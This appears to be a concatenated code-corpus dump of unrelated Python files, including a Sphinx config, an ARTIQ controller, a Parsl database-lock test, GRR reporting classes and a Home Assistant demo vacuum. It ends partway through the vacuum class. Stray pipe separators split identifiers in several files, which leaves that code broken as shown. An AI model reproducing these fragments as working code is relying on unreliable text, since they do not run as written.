prop.value[nt], fb = prop.value[nt].propose()
return prop, fb
|
luanrafael/pygame-site | FlaskApp/src/views/__init__.py | Python | mit | 189 | 0 | ''''
This module is intended to contain the blueprints o | f the project
if you want more information about blue | prints you can checkout this link:
http://flask.pocoo.org/docs/blueprints/
'''
|
eevee/sanpera | doc/conf.py | Python | isc | 7,742 | 0.007492 | # -*- coding: utf-8 -*-
#
# sanpera documentation build configuration file, created by
# sphinx-quickstart2 on Sat May 12 21:24:07 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'sanpera'
copyright = u'2012, Eevee'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1.0'
# The full version, including alpha/beta/rc tags.
release = '0.1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each le | tter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Defau | lt is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'sanperadoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'sanpera.tex', u'sanpera Documentation',
u'Eevee', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'sanpera', u'sanpera Documentation',
[u'Eevee'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'sanpera', u'sanpera Documentation',
u'Eevee', 'sanpera', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
|
cjbe/artiqDrivers | artiqDrivers/frontend/rohdeSynth_controller.py | Python | gpl-3.0 | 1,342 | 0.00149 | #!/usr/bin/env python3.5
import argparse
import sys
from artiqDrivers.devices.rohdeSynth.driver import RohdeSynth
from sipyco.pc_rpc import simple_server_loop
from sipyco.common_args import simple_network_args, init_logger_from_args
from oxart.tools import add_common_args
def get_argparser():
parser = argparse.ArgumentParser(description="ARTIQ controller for the Rohde&Schwarz SMA100A synthesiser")
parser.add_argument("-i", "--ipaddr", default=None,
help="IP address of synth")
parser.add_argument("--simulation", action="store_true",
| help="Put the driver in simulation mode, even if "
"--ipaddress is used.")
simple_network_args(parser, 4004)
add_common_args( | parser)
return parser
def main():
args = get_argparser().parse_args()
init_logger_from_args(args)
if not args.simulation and args.ipaddr is None:
print("You need to specify either --simulation or -i/--ipaddr "
"argument. Use --help for more information.")
sys.exit(1)
if args.simulation:
dev = RohdeSynthSim()
else:
dev = RohdeSynth(addr=args.ipaddr)
try:
simple_server_loop({"rohdeSynth": dev}, args.bind, args.port)
finally:
dev.close()
if __name__ == "__main__":
main()
|
googleapis/python-service-management | samples/generated_samples/servicemanagement_v1_generated_service_manager_create_service_sync.py | Python | apache-2.0 | 1,564 | 0.000639 | # -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for CreateService
# NOTE: This snippet has been auto | matically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-service-management
# [START servicemanagement_v1_generated_ServiceManager_CreateService_sync]
from googl | e.cloud import servicemanagement_v1
def sample_create_service():
# Create a client
client = servicemanagement_v1.ServiceManagerClient()
# Initialize request argument(s)
request = servicemanagement_v1.CreateServiceRequest(
)
# Make the request
operation = client.create_service(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
# [END servicemanagement_v1_generated_ServiceManager_CreateService_sync]
|
Parsl/parsl | parsl/tests/test_monitoring/test_db_locks.py | Python | apache-2.0 | 2,848 | 0 | import logging
import os
import parsl
import pytest
import time
logger = logging.getLogger(__name__)
@parsl.python_app
def this_app():
return 5
@pytest.mark.local
def test_row_counts():
from parsl.tests.configs.htex_local_alternate import fresh_config
import sqlalchemy
if os.path.exists("runinfo/monitoring.db"):
logger.info("Monitoring database already exists - deleting")
os.remove("runinfo/monitoring.db")
engine = sqlalchemy.create_engine("sqlite:///runinfo/monitoring.db")
logger.info("loading parsl")
parsl.load(fresh_config())
# parsl.load() returns before all initialisation of monitoring
# is complete, which means it isn't safe to take a read lock on
# the database yet. This delay tries to work around that - some
# better async behaviour might be nice, but what?
#
# Taking a read lock before monitoring is initialized will cause
# a failure in the part of monitoring which creates tables, and
# which is not protected against read locks at the time this test
# was written.
time.sleep(10)
# to get an sqlite3 read lock that is held over a controllable
# long time, create a transaction and perform | a SELECT in it.
# The lock will be held until the end of the transaction.
# (see bottom of https://sqlite.org/lockingv3.html)
logger.info("Getting a read lock on the monitoring database")
| with engine.begin() as readlock_connection:
readlock_connection.execute("BEGIN TRANSACTION")
result = readlock_connection.execute("SELECT COUNT(*) FROM workflow")
(c, ) = result.first()
assert c == 1
# now readlock_connection should have a read lock that will
# stay locked until the transaction is ended, or the with
# block ends.
logger.info("invoking and waiting for result")
assert this_app().result() == 5
# there is going to be some raciness here making sure that
# the database manager actually tries to write while the
# read lock is held. I'm not sure if there is a better way
# to detect this other than a hopefully long-enough sleep.
time.sleep(10)
logger.info("cleaning up parsl")
parsl.dfk().cleanup()
parsl.clear()
# at this point, we should find data consistent with executing one
# task in the database.
logger.info("checking database content")
with engine.begin() as connection:
result = connection.execute("SELECT COUNT(*) FROM workflow")
(c, ) = result.first()
assert c == 1
result = connection.execute("SELECT COUNT(*) FROM task")
(c, ) = result.first()
assert c == 1
result = connection.execute("SELECT COUNT(*) FROM try")
(c, ) = result.first()
assert c == 1
logger.info("all done")
|
bird-house/flyingpigeon | flyingpigeon/nc_statistic.py | Python | apache-2.0 | 10,385 | 0.002215 | from flyingpigeon.nc_utils import get_values, get_coordinates, get_index_lat, get_variable
from os.path import basename, join
from datetime import datetime as dt
from shutil import copyfile
from netCDF4 import Dataset
import numpy as np
import logging
LOGGER = logging.getLogger("PYWPS")
def fieldmean(resource):
"""
calculating of a weighted field mean
:param resource: str or list of str containing the netCDF files paths
:return list: timeseries of the averaged values per timestep
"""
from numpy import radians, average, cos, sqrt, array
data = get_values(resource) # np.squeeze(ds.variables[variable][:])
# dim = data.shape
| LOGGER.debug(data.shape)
if len(data.shape) == 3:
# TODO if data.shape == 2 , 4 ...
lats, lons = get_coordinates(resource, unrotate=False)
lats = array(lats)
if len(lats.shape) == 2:
lats = lats[:, 0]
else:
LOGGER.debug('Latitudes not reduced to 1D')
# TODO: calculat weighed average with 2D lats (rotated p | ole coordinates)
# lats, lons = get_coordinates(resource, unrotate=False)
# if len(lats.shape) == 2:
# lats, lons = get_coordinates(resource)
lat_index = get_index_lat(resource)
LOGGER.debug('lats dimension %s ' % len(lats.shape))
LOGGER.debug('lats index %s' % lat_index)
lat_w = sqrt(cos(lats * radians(1)))
meanLon = average(data, axis=lat_index, weights=lat_w)
meanTimeserie = average(meanLon, axis=1)
LOGGER.debug('fieldmean calculated')
else:
LOGGER.error('not 3D shaped data. Average can not be calculated')
return meanTimeserie
def robustness_cc_signal(variable_mean, standard_deviation=None,
variable=None, dir_output=None):
"""
Claculating the Climate Change signal based on the output of robustness_stats.
:param variable_mean: list of two 2D spatial netCDF files
in the order of [refenence, projection]
:param standard_deviation: according to variable_mean files 2D netCDF files of the standard deviation
:return netCDF files: cc_signal.nc, mean_std.nc
"""
from os.path import join
basename_ref = basename(variable_mean[0]).split('_')
basename_proj = basename(variable_mean[1]).split('_')
# ensstd_tg_mean_1981-01-01-2010-12-31.nc'
if variable is None:
variable = get_variable(variable_mean[0])
ds = Dataset(variable_mean[0])
vals_ref = np.squeeze(ds[variable][:])
ds.close()
ds = Dataset(variable_mean[1])
vals_proj = np.squeeze(ds[variable][:])
ds.close()
if standard_deviation is not None:
ds = Dataset(standard_deviation[0])
std_ref = np.squeeze(ds[variable][:])
ds.close()
ds = Dataset(standard_deviation[1])
std_proj = np.squeeze(ds[variable][:])
ds.close()
bn_mean_std = 'mean-std_{}_{}_{}'.format(basename_ref[1], basename_ref[-2], basename_proj[-1])
out_mean_std = copyfile(standard_deviation[0], join(dir_output, bn_mean_std))
ds_median_std = Dataset(out_mean_std, mode='a')
ds_median_std[variable][:] = (std_ref + std_proj) / 2
ds_median_std.close()
else:
out_mean_std = None
bn_cc_signal = 'cc-signal_{}_{}_{}'.format(basename_ref[1], basename_ref[-2], basename_proj[-1])
out_cc_signal = copyfile(variable_mean[0], join(dir_output, bn_cc_signal))
ds_cc = Dataset(out_cc_signal, mode='a')
ds_cc[variable][:] = np.squeeze(vals_proj - vals_ref)
ds_cc.close()
return out_cc_signal, out_mean_std
def robustness_stats(resources, time_range=[None, None], dir_output=None, variable=None):
"""
calculating the spatial mean and corresponding standard deviation for an ensemble
of consistent datasets containing one variableself.
If a time range is given the statistical values are calculated only in the disired timeperiod.
:param resources: str or list of str containing the netCDF files paths
:param time_range: sequence of two datetime.datetime objects to mark start and end point
:param dir_output: path to folder to store ouput files (default= curdir)
:param variable: variable name containing in netCDF file. If not set, variable name gets detected
:return netCDF files: out_ensmean.nc, out_ensstd.nc
"""
from ocgis import OcgOperations, RequestDataset, env
env.OVERWRITE = True
if variable is None:
variable = get_variable(resources[0])
out_means = []
for resource in resources:
rd = RequestDataset(resource, variable)
prefix = basename(resource).replace('.nc', '')
LOGGER.debug('processing mean of {}'.format(prefix))
calc = [{'func': 'median', 'name': variable}]
# {'func': 'median', 'name': 'monthly_median'}
ops = OcgOperations(dataset=rd, calc=calc, calc_grouping=['all'],
output_format='nc', prefix='median_'+prefix, time_range=time_range, dir_output=dir_output)
out_means.append(ops.execute())
# nc_out = call(resource=resources, calc=[{'func': 'mean', 'name': 'ens_mean'}],
# calc_grouping='all', # time_region=time_region,
# dir_output=dir_output, output_format='nc')
####
# read in numpy array
for i, out_mean in enumerate(out_means):
if i == 0:
ds = Dataset(out_mean)
var = ds[variable][:]
dims = [len(out_means), var[:].shape[-2], var[:].shape[-1]]
vals = np.empty(dims)
vals[i, :, :] = np.squeeze(var[:])
ds.close()
else:
ds = Dataset(out_mean)
vals[i, :, :] = np.squeeze(ds[variable][:])
ds.close()
####
# calc median, std
val_median = np.nanmedian(vals, axis=0)
val_std = np.nanstd(vals, axis=0)
#####
# prepare files by copying ...
ensmean_file = 'ensmean_{}_{}_{}.nc'.format(variable, dt.strftime(time_range[0], '%Y-%m-%d'),
dt.strftime(time_range[1], '%Y-%m-%d'))
out_ensmean = copyfile(out_means[0], join(dir_output, ensmean_file))
ensstd_file = 'ensstd_{}_{}_{}.nc'.format(variable, dt.strftime(time_range[0], '%Y-%m-%d'),
dt.strftime(time_range[1], '%Y-%m-%d'))
out_ensstd = copyfile(out_means[0], join(dir_output, ensstd_file))
####
# write values to files
ds_median = Dataset(out_ensmean, mode='a')
ds_median[variable][:] = val_median
ds_median.close()
ds_std = Dataset(out_ensstd, mode='a')
ds_std[variable][:] = val_std
ds_std.close()
LOGGER.info('processing the overall ensemble statistical mean ')
# prefix = 'ensmean_tg-mean_{}-{}'.format(dt.strftime(time_range[0], '%Y-%m-%d'),
# dt.strftime(time_range[1], '%Y-%m-%d'))
# rd = RequestDataset(out_means, var)
# calc = [{'func': 'mean', 'name': 'mean'}] # {'func': 'median', 'name': 'monthly_median'}
# ops = OcgOperations(dataset=rd, calc=calc, calc_grouping=['all'],
# output_format=output_format, prefix='mean_'+prefix, time_range=time_range)
# ensmean = ops.execute()
return out_ensmean, out_ensstd
# call(resource=[], variable=None, dimension_map=None, agg_selection=True,
# calc=None, calc_grouping=None, conform_units_to=None, crs=None,
# memory_limit=None, prefix=None,
# regrid_destination=None, regrid_options='bil', level_range=None, # cdover='python',
# geom=None, output_format_options=None, search_radius_mult=2.,
# select_nearest=False, select_ugid=None, spatial_wrapping=None,
# t_calendar=None, time_region=None,
# time_range=None, dir_output=None, output_format='nc'):
# CDO is disabled ...
# def remove_mean_trend(fana, varname):
# """
# Removing the smooth trend from 3D netcdf file
# """
# from cdo import Cdo
# from netCDF4 import Dataset
# import uuid
# from scipy.interpolate import UnivariateSpline
# from os import s |
statik/grr | lib/aff4_objects/reports.py | Python | apache-2.0 | 8,500 | 0.007529 | #!/usr/bin/env python
"""Module containing a set of reports for management of GRR."""
import csv
import datetime
import StringIO
import time
import logging
from grr.lib import config_lib
from grr.lib import email_alerts
from grr.lib import export_utils
from grr.lib import rdfvalue
from grr.lib import registry
from grr.lib.aff4_objects import aff4_grr
from grr.lib.aff4_objects import network
class Report(object):
"""The baseclass for all reports."""
# Register a metaclass registry to track all reports.
__metaclass__ = registry.MetaclassRegistry
class ClientReport(Report):
"""The baseclass of all client reports."""
EMAIL_TEMPLATE = """
<html><body><h2>%(report_name)s</h2>
%(report_text)s
<br/>
<p>Thanks,</p>
<p>%(signature)s</p>
</body></html>"""
EMAIL_FROM = "noreply"
# List of attributes to add to the report from the / path in the client.
REPORT_ATTRS = []
# List of tuples of (path, attribute) to add to the report.
EXTENDED_REPORT_ATTRS = []
__abstract = True # pylint: disable=g-bad-name
def __init__(self, token=None, thread_num=20):
self.token = token
self.results = []
self.fields = [f.name for f in self.REPORT_ATTRS]
self.fields += [f[1].name for f in self.EXTENDED_REPORT_ATTRS]
self.thread_num = thread_num
self.broken_clients = [] # Clients that are broken or fail to run.
def AsDict(self):
"""Give the report as a list of dicts."""
if not self.results:
logging.warn("Run has not been called, no results.")
else:
return self.results
def AsCsv(self):
"""Give the report in CSV format."""
output = StringIO.StringIO()
writer = csv.DictWriter(output, self.fields)
if hasattr(writer, "writeheader"):
writer.writeheader() # requires 2.7
for val in self.results:
writer.writerow(val)
output.seek(0)
return output
def SortResults(self, field):
"""Sort the result set."""
logging.debug("Sorting %d results", len(self.results))
self.results.sort(key=lambda x: str(x.get(field, "")))
def AsHtmlTable(self):
"""Return the results as an HTML table."""
th = ["<th>%s</th>" % f for f in self.fields]
headers = "<tr>%s</tr>" % "".join(th)
rows = []
for val in self.results:
values = [val[k] for k in self.fields]
row = ["<td>%s</td>" % f for f in values]
rows.append("<tr>%s</tr>" % "".join(row))
html_out = "<table>%s%s</table>" % (headers, "\n".join(rows))
return html_out
def AsText(self):
"""Give the report as formatted text."""
output = StringIO.StringIO()
fields = self.fields
writer = csv.DictWriter(output, fields, dialect=csv.excel_tab)
for val in self.results:
writer.writerow(val)
output.seek(0)
return output
def MailReport(self, recipient, subject=None):
"""Mail the HTML report to recipient."""
dt = rdfvalue.RDFDatetime().Now().Format("%Y-%m-%dT%H-%MZ")
subject = subject or "%s - %s" % (self.REPORT_NAME, dt)
csv_data = self.AsCsv()
filename = "%s-%s.csv" % (self.REPORT_NAME, dt)
email_alerts.EMAIL_ALERTER.SendEmail(
recipient, self.EMAIL_FROM, subject,
"Please find the CSV report file attached",
attachments={filename: csv_data.getvalue()},
is_html=False)
logging.info("Report %s mailed to %s", self.REPORT_NAME, recipient)
def MailHTMLReport(self, recipient, subject=None):
"""Mail the HTML report to recipient."""
dt = rdfvalue.RDFDatetime().Now().Format("%Y-%m-%dT%H-%MZ")
subject = subject or "%s - %s" % (self.REPORT_NAME, dt)
report_text = self.AsHtmlTable()
email_alerts.EMAIL_ALERTER.SendEmail(
recipient, self.EMAIL_FROM, subject,
self.EMAIL_TEMPLATE % dict(
report_text=report_text,
report_name=self.REPORT_NAME,
signature=config_lib.CONFIG["Email.signature"]),
is_html=True)
logging.info("Report %s mailed to %s", self.REPORT_NAME, recipient)
def Run(self, max_age=60 * 60 * 24 * 7):
"""Run the report.
Args:
max_age: Maximum age in seconds of the client to include in report.
"""
pass
def _QueryResults(self, max_age):
"""Query each record in the client database."""
report_iter = ClientReportIterator(
max_age=max_age, token=self.token, report_attrs=self.REPORT_ATTRS,
extended_report_attrs=self.EXTENDED_REPORT_ATTRS)
self.broken_clients = report_iter.broken_subjects
return report_iter.Run()
class ClientListReport(ClientReport):
"""Returns a list of clients with their version."""
REPORT_ATTRS = [
aff4_grr.VFSGRRClient.SchemaCls.GetAttribute("LastCheckin"),
aff4_grr.VFSGRRClient.SchemaCls.GetAttribute("subject"),
aff4_grr.VFSGRRClient.SchemaCls.GetAttribute("Host"),
aff4_grr.VFSGRRClient.SchemaCls.GetAttribute("System"),
aff4_grr.VFSGRRClient.SchemaCls.GetAttribute("Architecture"),
aff4_grr.VFSGRRClient.SchemaCls.GetAttribute("Uname"),
aff4_grr.VFSGRRClient.SchemaCls.GetAttribute("GRR client"),
]
EXTENDED_REPORT_ATTRS = [
("network", network.Network.SchemaCls.GetAttribute("Interfaces"))
]
REPORT_NAME = "GRR Client List Report"
def Run(self, max_age=60 * 60 * 24 * 7):
"""Collect all the data for the report."""
start_time = time.time()
self.results = []
self.broken_subjects = []
for client in self._QueryResults(max_age):
self.results.append(client)
self.SortResults("GRR client")
logging.info("%s took %s to complete", self.REPORT_NAME,
datetime.timedelta(seconds=time.time() - start_time))
class VersionBreakdownReport(ClientReport):
"""Returns a breakdown of versions."""
REPORT_ATTRS = [
aff4_grr.VFSGRRClient.SchemaCls.GetAttribute("GRR client")
]
REPORT_NAME = "GRR Client Version Breakdown Report"
def Run(self, max_age=60 * 60 * 24 * 7):
"""Run the report."""
counts = {}
self.fields.append("count")
self.results = []
for client in self._QueryResults(max_age):
version = client.get("GRR client")
try:
counts[version] += 1
except KeyError:
counts[version] = 1
for version, count in counts.iteritems():
self.results.append({"GRR client": version, "count": count})
self.SortResults("count")
class ClientReportIterator(export_utils.IterateAllClients):
"""Iterate through all clients generating basic client information."""
def __init__(self, report_attrs, extended_report_attrs, **kwargs):
"""Initialize.
Args:
report_attrs: Attributes to retrieve.
extended_report_attrs: Path, Attribute tuples to retrieve.
**kwargs: Additional args to fall through to client iterator.
"""
super( | ClientReportIterator, self).__init__(**kwargs)
self.report_attrs = report_attrs
self.extended_report_attrs = extended_report_attrs
def IterFunction(self, client, out_queue, unused_token):
"""Extract report attributes."""
result = {}
for attr in self.report_attrs:
# Do some special formatting for certain fields.
if attr.name == "subject":
result[attr.name] = client.Get(attr).Basename()
elif attr.name == " | GRR client":
c_info = client.Get(attr)
if not c_info:
self.broken_subjects.append(client.client_id)
result[attr.name] = None
continue
result[attr.name] = "%s %s" % (c_info.client_name,
str(c_info.client_version))
else:
result[attr.name] = client.Get(attr)
for sub_path, attr in self.extended_report_attrs:
try:
client_sub = client.OpenMember(sub_path)
# TODO(user): Update this to use MultiOpen.
except IOError:
# If the path is not found, just continue.
continue
# Special case formatting for some attributes.
if attr.name == "Interfaces":
interfaces = client_sub.Get(attr)
if interfaces:
try:
result[attr.name] = ",".join(interfaces.GetIPAddresses())
except AttributeError:
result[attr.name] = ""
else:
result[attr.name] = client_s |
ThatSnail/impede | impede-app/server/py/wire.py | Python | mit | 2,414 | 0.000414 |
""" A component that designates a wire. """
from graph import Node, Edge
from constraint import Constraint
class Wire(object):
""" Wire component """
def __init__(self, graph, node_a=None, node_b=None, edge_i=None):
""" Initializes a wire with two nodes. Current goes from
A to B. If nodes / edges aren't supplied, new ones are created.
Supplied nodes / edges should be part of the supplied graph.
Args:
graph : Graph object
node_a : Node object
node_b : Node object
edge_i : Edge object
Returns:
Wire object
"""
| if not node_a:
node_a = Node(graph)
if not node_b:
node_b = Node(graph)
if not edge_i:
edge_i = Edge(graph, node_a, node_b)
self._node_a = node_a
self._node_b = node_b
self._edge_i = edge_i
def node_a(self):
""" Returns node A.
Returns:
Node object
"""
return self._node_a
def node_b(self):
""" | Returns node B.
Returns:
Node object
"""
return self._node_b
def edge_i(self):
""" Returns the edge that stores current from A to B.
Returns:
Edge object
"""
return self._edge_i
def substitutions(self):
""" Return a dictionary mapping each symbol to a value. Return
an empty dictionary if no substitutions exist
Returns:
dictionary from sympy variable to value
"""
return {}
def variables(self):
""" Returns a set of variables under constraints.
Returns:
set of Nodes, Edges, tuples, or strings
"""
return set([self._node_a, self._node_b, self._edge_i])
def constraints(self):
""" Returns a list of constraints that must be solved.
A constraint is a tuple (coefficients, variables), where
coefficients is a list of numbers corresponding to the linear
equation:
A_0 * x_0 + A_1 * x_1 + ... + A_{n-1} * x_{n-1} = 0,
and variables is a list of the Node and Edge objects.
Returns:
List of Constraint objects
"""
cs = [1, -1]
xs = [self._node_a, self._node_b]
constraint = Constraint(cs, xs)
return [constraint]
|
jpardobl/monscale | monscale/management/commands/trap_worker.py | Python | bsd-3-clause | 654 | 0.009174 | import l | ogging, redis, time
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from monscale.rules import evaluate_traps
class Command(BaseCommand):
args = ''
help = 'Retrieve queued actions and execute them.'
def handle(self, *args, **options):
# logging.basicConfig(level=logging.DEBUG)
while True:
logging.debug("[trap_worker] starting loop ...")
evaluate_traps()
lo | gging.debug("[trap_worker] going to sleep for %ss" % settings.ACTION_WORKER_SLEEP_SECS)
time.sleep(settings.ACTION_WORKER_SLEEP_SECS)
|
JoeJasinski/WindyTransit | mobiletrans/mtimport/management/commands/mt_import_zipcodes.py | Python | mit | 714 | 0.007003 | import os
from django.core.management.b | ase import BaseCommand, CommandError
from django.conf import settings
from mobiletrans.mtimport.importers import importer_zipcode as importer
class Command(BaseCommand):
args = '<zipcodes.kml>'
help = 'Import Routes'
def handle(self, input_file_path="", **options):
if not input_file_path:
input_file_path = "%s" % os.path.join(settings.ENVIRONMENT_ROOT, "data", "zipcodes.kml")
self.stdout.write("Import %s \n" % input_file_path)
input_record = | importer.Zipcode.data_import(input_file_path)
print input_file_path
self.stdout.write('Import completed with status: %s\n' % input_record.get_status_display())
|
HydrelioxGitHub/home-assistant | homeassistant/components/vacuum/demo.py | Python | apache-2.0 | 10,494 | 0 | """
Demo platform for the vacuum component.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/demo/
"""
import logging
from homeassistant.components.vacuum import (
ATTR_CLEANED_AREA, SUPPORT_BATTERY, SUPPORT_CLEAN_SPOT,
SUPPORT_FAN_SPEED, SUPPORT_LOCATE, SUPPORT_PAUSE, SUPPORT_RETURN_HOME,
SUPPORT_SEND_COMMAND, SUPPORT_STATUS, SUPPORT_STOP, SUPPORT_TURN_OFF,
SUPPORT_TURN_ON, SUPPORT_STATE, SUPPORT_START, STATE_CLEANING,
STATE_DOCKED, STATE_IDLE, STATE_PAUSED, STATE_RETURNING, VacuumDevice,
StateVacuumDevice)
_LOGGER = logging.getLogger(__name__)
SUPPORT_MINIMAL_SERVICES = SUPPORT_TURN_ON | SUPPORT_TURN_OFF
SUPPORT_BASIC_SERVICES = SUPPORT_TURN_ON | SUPPORT_TURN_OFF | \
SUPPORT_STATUS | SUPPORT_BATTERY
SUPPORT_MOST_SERVICES = SUPPORT_TURN_ON | SUPPORT_TURN_OFF | SUPPORT_STOP | \
SUPPORT_RETURN_HOME | SUPPORT_STATUS | SUPPORT_BATTERY
SUPPORT_ALL_SERVICES = SUPPORT_TURN_ON | SUPPORT_TURN_OFF | SUPPORT_PAUSE | \
SUPPORT_STOP | SUPPORT_RETURN_HOME | \
SUPPORT_FAN_SPEED | SUPPORT_SEND_COMMAND | \
SUPPORT_LOCATE | SUPPORT_STATUS | SUPPORT_BATTERY | \
SUPPORT_CLEAN_SPOT
SUPPORT_STATE_SERVICES = SUPPORT_STATE | SUPPORT_PAUSE | SUPPORT_STOP | \
SUPPORT_RETURN_HOME | SUPPORT_FAN_SPEED | \
SUPPORT_BATTERY | SUPPORT_CLEAN_SPOT | SUPPORT_START
FAN_SPEEDS = ['min', 'medium', 'high', 'max']
DEMO_VACUUM_COMPLETE = '0_Ground_floor'
DEMO_VACUUM_MOST = '1_First_floor'
DEMO_VACUUM_BASIC = '2_Second_floor'
DEMO_VACUUM_MINIMAL = '3_Third_floor'
DEMO_VACUUM_NONE = '4_Fourth_floor'
DEMO_VACUUM_STATE = '5_Fifth_floor'
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Demo vacuums."""
add_entities([
DemoVacuum(DEMO_VACUUM_COMPLETE, SUPPORT_ALL_SERVICES),
DemoVacuum(DEMO_VACUUM_MOST, SUPPORT_MOST_SERVICES),
DemoVacuum(DEMO_VACUUM_BASIC, SUPPORT_BASIC_SERVICES),
DemoVacuum(DEMO_VACUUM_MINIMAL, SUPPORT_MINIMAL_SERVICES),
DemoVacuum(DEMO_VACUUM_NONE, 0),
StateDemoVacuum(DE | MO_VACUUM_STATE),
])
class DemoVacuum(VacuumDevice):
"""Representation of a demo vacuum."""
def __init__(self, name, supported_features):
"""Initialize the vacuum."""
self._name = name
self | ._supported_features = supported_features
self._state = False
self._status = 'Charging'
self._fan_speed = FAN_SPEEDS[1]
self._cleaned_area = 0
self._battery_level = 100
@property
def name(self):
"""Return the name of the vacuum."""
return self._name
@property
def should_poll(self):
"""No polling needed for a demo vacuum."""
return False
@property
def is_on(self):
"""Return true if vacuum is on."""
return self._state
@property
def status(self):
"""Return the status of the vacuum."""
if self.supported_features & SUPPORT_STATUS == 0:
return
return self._status
@property
def fan_speed(self):
"""Return the status of the vacuum."""
if self.supported_features & SUPPORT_FAN_SPEED == 0:
return
return self._fan_speed
@property
def fan_speed_list(self):
"""Return the status of the vacuum."""
assert self.supported_features & SUPPORT_FAN_SPEED != 0
return FAN_SPEEDS
@property
def battery_level(self):
